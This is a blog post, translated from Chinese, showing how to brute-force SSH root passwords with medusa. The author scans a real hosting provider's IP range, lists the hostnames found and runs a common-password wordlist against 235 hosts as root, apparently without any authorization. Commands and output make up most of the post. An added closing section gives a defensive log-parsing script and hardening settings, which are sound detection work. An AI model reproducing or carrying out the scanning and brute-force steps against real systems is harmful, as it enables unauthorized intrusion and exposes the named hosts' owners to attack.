Cracking Linux SSH passwords with medusa

From 一不小心高潮了's blog

Bored, so here is a quick write-up. medusa is fairly fast at cracking. First, let's look at its help output:

root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT] : Target hostname or IP address
-H [FILE] : File containing target hostnames or IP addresses
-u [TEXT] : Username to test
-U [FILE] : File containing usernames to test
-p [TEXT] : Password to test
-P [FILE] : File containing passwords to test
-C [FILE] : File containing combo entries. See README for more information.
-O [FILE] : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT] : Name of the module to execute (without the .mod extension)
-m [TEXT] : Parameter to pass to the module. This can be passed multiple times with a
different parameter each time and they will all be sent to the module (i.e.
-m Param1 -m Param2, etc.)
-d : Dump all known modules
-n [NUM] : Use for non-default TCP port number
-s : Enable SSL
-g [NUM] : Give up after trying to connect for NUM seconds (default 3)
-r [NUM] : Sleep NUM seconds between retry attempts (default 3)
-R [NUM] : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM] : Total number of logins to be tested concurrently
-T [NUM] : Total number of hosts to be tested concurrently
-L : Parallelize logins using one username per thread. The default is to process
the entire username before proceeding.
-f : Stop scanning host after first valid username/password found.
-F : Stop audit after first valid username/password found on any host.
-b : Suppress startup banner
-q : Display module's usage information
-v [NUM] : Verbose level [0 - 6 (more)]
-w [NUM] : Error debug level [0 - 10 (more)]
-V : Display version
-Z [NUM] : Resume scan from host #

OK, let's see which modules medusa has and which services they can crack:

root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 1.0.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
+ http.mod : Brute force module for HTTP : version 1.3.0
+ imap.mod : Brute force module for IMAP sessions : version 1.2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
+ mysql.mod : Brute force module for MySQL sessions : version 1.2
+ ncp.mod : Brute force module for NCP sessions : version 1.0.0
+ nntp.mod : Brute force module for NNTP sessions : version 1.0.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
+ pop3.mod : Brute force module for POP3 sessions : version 1.2
+ postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
+ rexec.mod : Brute force module for REXEC sessions : version 1.1.1
+ rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
+ rsh.mod : Brute force module for RSH sessions : version 1.0.1
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
+ ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
+ svn.mod : Brute force module for Subversion sessions : version 1.0.0
+ telnet.mod : Brute force module for telnet sessions : version 1.2.2
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
+ vnc.mod : Brute force module for VNC sessions : version 1.0.1
+ web-form.mod : Brute force module for web forms : version 1.0.0
+ wrapper.mod : Generic Wrapper Module : version 1.0.1

Right, we want to crack ssh, so we load the ssh module with the -M ssh option; the .mod extension is not needed.

First we settle on targets by scanning for machines with ssh open; just pick any range and scan it:

root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

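Then comes a long wait. The options above scan the whole range for machines with port 22 open, detect the service version, and save the results to the file ssh.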

Then we look at the scan results:

root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 69.163.190.0/24

Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.13 (alt-malware.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
The output looks like this. We need to tidy it up and pull out the IPs that have ssh open; now you can see the point of saving with -oG.

root@perl-exploit:/pentest# grep 22/open ssh | cut -d " " -f 2 >>ssh1.txt

This command uses cut; I won't go into its usage in detail. Check the result:

root@perl-exploit:/pentest# cat ssh1.txt
The file now holds one IP address per line. Next, we grab any wordlist and start cracking the ssh passwords:

root@perl-exploit:/pentest# medusa -H ssh1.txt -u root -P p.txt -M ssh
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: postgres (5 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: webmin (6 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.4 (1 of 235, 1 complete) User: root (1 of 1, 1 complete) Password: fuckyou (7 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: root (1 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: admin (2 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: oracle (3 of 7 complete)
ACCOUNT CHECK: [ssh] Host: 69.163.190.5 (2 of 235, 2 complete) User: root (1 of 1, 1 complete) Password: tomcat (4 of 7 complete)
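OK, now wait. In the meantime you can go do you-know-what, or find a you-know-what video and do you-know-what; the results are shown automatically at the end.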
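On the receiving host, a run like the one above shows up in the sshd log as a burst of failed root password logins from a single source. The following is an added example, not part of the original post, that flags such sources in OpenSSH syslog lines; the log lines, addresses, the `THRESHOLD` value and the function names are constructed for illustration, and it counts over whatever log slice it is given rather than over a time window.

```shell
#!/usr/bin/env bash
# Added example: flag sources with repeated failed root password logins in sshd logs.
# Assumes OpenSSH syslog lines: "Failed password for root from IP port N ssh2".

THRESHOLD=5   # assumed cut-off; tune to your own baseline

# Constructed sample log using documentation address ranges, not real data.
sample_log() {
  cat <<'EOF'
Jun 22 02:40:01 web1 sshd[4101]: Failed password for root from 198.51.100.23 port 40112 ssh2
Jun 22 02:40:02 web1 sshd[4101]: Failed password for root from 198.51.100.23 port 40112 ssh2
Jun 22 02:40:03 web1 sshd[4105]: Failed password for root from 198.51.100.23 port 40118 ssh2
Jun 22 02:40:04 web1 sshd[4105]: message repeated 2 times: [ Failed password for root from 198.51.100.23 port 40118 ssh2]
Jun 22 02:40:06 web1 sshd[4109]: Failed password for root from 198.51.100.23 port 40121 ssh2
Jun 22 02:40:07 web1 sshd[4109]: Failed password for root from 198.51.100.23 port 40121 ssh2
Jun 22 02:41:10 web1 sshd[4120]: Failed password for invalid user admin from 198.51.100.23 port 40130 ssh2
Jun 22 03:02:44 web1 sshd[4200]: Failed password for root from 203.0.113.9 port 51514 ssh2
Jun 22 03:02:50 web1 sshd[4200]: Failed password for root from 203.0.113.9 port 51514 ssh2
Jun 22 03:03:01 web1 sshd[4200]: Accepted password for root from 203.0.113.9 port 51514 ssh2
EOF
}

# Reads sshd log lines on stdin and prints "ip count" for every source whose
# failed root password logins reach the threshold ($1, default THRESHOLD).
flag_root_bruteforce() {
  awk -v min="${1:-$THRESHOLD}" '
    /sshd\[[0-9]+\]:/ && / Failed password for root from / {
      n = 1
      # rsyslog may collapse identical lines into "message repeated N times: [...]"
      if (match($0, /message repeated [0-9]+ times/)) {
        split(substr($0, RSTART, RLENGTH), w, " "); n = w[3]
      }
      for (i = 1; i < NF; i++) if ($i == "from") { ip = $(i + 1); break }
      fails[ip] += n
    }
    END { for (ip in fails) if (fails[ip] >= min) print ip, fails[ip] }
  ' | sort
}

sample_log | flag_root_bruteforce
```

Setting `PermitRootLogin no` and `PasswordAuthentication no` in sshd_config removes the password prompt that this kind of run depends on.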

Original article: https://www.cnblogs.com/ch3n3y/p/5877018.html